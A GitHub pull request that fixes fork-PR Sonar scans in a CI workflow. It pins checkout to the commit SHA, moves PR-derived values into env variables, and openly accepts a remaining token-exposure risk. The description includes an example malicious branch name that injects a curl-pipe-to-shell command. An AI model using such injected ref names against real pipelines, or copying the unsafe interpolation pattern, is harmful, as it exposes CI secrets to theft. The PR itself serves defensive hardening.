### PR TITLE
Restore Sonar analysis on fork pull requests

### DIFF
--- a/.github/workflows/sonar.yaml
+++ b/.github/workflows/sonar.yaml
@@ -32,20 +32,31 @@ jobs:
           route: GET /repos/${{ github.event.repository.full_name }}/pulls/${{ steps.pr_number.outputs.content }}
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-      # Checkout the PR branch
+      # allow-unsafe-pr-checkout re-enables fork-PR checkout, refused by default
+      # from workflow_run since checkout v6.1.0. Accepted only until the scan moves
+      # to the sonar-scanner CLI, because the mvn step below executes the fork's
+      # pom with SONAR_TOKEN in scope. Pinned to head_sha rather than the
+      # fork-writable branch ref, so the tree matches the PR data read above.
       - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6.1.0
         with:
           repository: ${{ github.event.workflow_run.head_repository.full_name }}
-          ref: ${{ github.event.workflow_run.head_branch }}
+          ref: ${{ github.event.workflow_run.head_sha }}
           fetch-depth: 0
+          allow-unsafe-pr-checkout: true
       # Checkout the base branch to keep the information about the new lines of code
       - name: Checkout base branch
         if: github.event.workflow_run.event == 'pull_request'
+        # PR-derived values go through env, not ${{ }} in the script: git permits
+        # ';' and backticks in ref names, so a crafted fork branch would execute.
+        env:
+          UPSTREAM_URL: ${{ github.event.repository.clone_url }}
+          BASE_REF: ${{ fromJson(steps.get_pr_data.outputs.data).base.ref }}
+          HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
         run: |
-          git remote add upstream ${{ github.event.repository.clone_url }}
+          git remote add upstream "$UPSTREAM_URL"
           git fetch upstream
-          git checkout -B ${{ fromJson(steps.get_pr_data.outputs.data).base.ref }} upstream/${{ fromJson(steps.get_pr_data.outputs.data).base.ref }}
-          git checkout ${{ github.event.workflow_run.head_branch }}
+          git checkout -B "$BASE_REF" "upstream/$BASE_REF"
+          git checkout "$HEAD_SHA"
           git clean -ffdx && git reset --hard HEAD
       # Download compiled classes
       - name: Download Compiled Classes
@@ -84,9 +95,13 @@ jobs:
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
           SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
+          SONAR_REVISION: ${{ github.event.workflow_run.head_sha }}
+          SONAR_PR_KEY: ${{ fromJson(steps.get_pr_data.outputs.data).number }}
+          SONAR_PR_BRANCH: ${{ fromJson(steps.get_pr_data.outputs.data).head.ref }}
+          SONAR_PR_BASE: ${{ fromJson(steps.get_pr_data.outputs.data).base.ref }}
         run: |
           mvn org.sonarsource.scanner.maven:sonar-maven-plugin:sonar \
-            -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} \
-            -Dsonar.pullrequest.key=${{ fromJson(steps.get_pr_data.outputs.data).number }} \
-            -Dsonar.pullrequest.branch=${{ fromJson(steps.get_pr_data.outputs.data).head.ref }} \
-            -Dsonar.pullrequest.base=${{ fromJson(steps.get_pr_data.outputs.data).base.ref }}
+            -Dsonar.scm.revision="$SONAR_REVISION" \
+            -Dsonar.pullrequest.key="$SONAR_PR_KEY" \
+            -Dsonar.pullrequest.branch="$SONAR_PR_BRANCH" \
+            -Dsonar.pullrequest.base="$SONAR_PR_BASE"


### PR DESCRIPTION
Sonar has failed on every fork PR since #1919 bumped `actions/checkout` to v6.1.0 on 2026-07-31. v6.1.0 backported `allow-unsafe-pr-checkout` with a default of `false`, which refuses fork-PR checkout from a `workflow_run` workflow:

```
##[error]Refusing to check out fork pull request code from a 'workflow_run' workflow.
```

Because the scan never starts, SonarCloud never posts the required `SonarCloud Code Analysis` status, so fork PRs are unmergeable with every other check green. #1936 is blocked on exactly this.

## The security tradeoff, stated plainly

The guard is correct about this job. The scan step runs `mvn` on the checked-out tree, so a fork's `pom.xml`, its plugins and any wrapper script execute with `SONAR_TOKEN` in scope. Setting the flag restores CI and leaves that exposure in place.

Worth being precise about what changes: **this PR does not add that exposure.** It is what the workflow did before 2026-07-31, and what 20 other org repos still do. The guard began reporting a pre-existing weakness; it did not create one. The comment on the checkout step records the acceptance and its exit condition rather than presenting the flag as a version-compatibility requirement.

The real fix is moving the scan to the standalone `sonar-scanner` CLI, which parses sources, class files and jars without invoking the project build. That needs the dependency jars shipped as an artifact for `sonar.java.libraries` (measured at 292 jars / 168 MB for this repo) and a fidelity comparison against the maven scanner first, so it is not in scope here.

## Two unrelated holes closed while the file is open

**Checkout pinned to `head_sha`.** Previously `ref: head_branch`. The branch ref is fork-writable, so a branch checkout could resolve to a different commit than the one whose PR data and artifacts the job already read.

**PR-derived values moved into `env:`.** Previously interpolated directly into `run:` blocks. Git permits `;`, `$`, `&` and backticks in ref names, so a fork branch named `x;curl evil.sh|sh` is a valid ref, and:

```yaml
git checkout ${{ github.event.workflow_run.head_branch }}
```

would execute it, in a job holding `SONAR_TOKEN`. **Reachable without touching any build file**, which makes it more exploitable than the pom-execution path above. `email-notification-provider` already uses the `env:` pattern; this repo did not.

## Verification and sequencing

YAML parses; step count unchanged at 11.

`workflow_run` workflows always execute the copy on the default branch, so this has no effect until merged. A re-run of the failed Sonar run will not pick it up either — re-runs reuse the original workflow file version. After merge, #1936 needs a fresh `workflow_run` event: re-run its Build PR run (`30908584100`) or push to the branch.
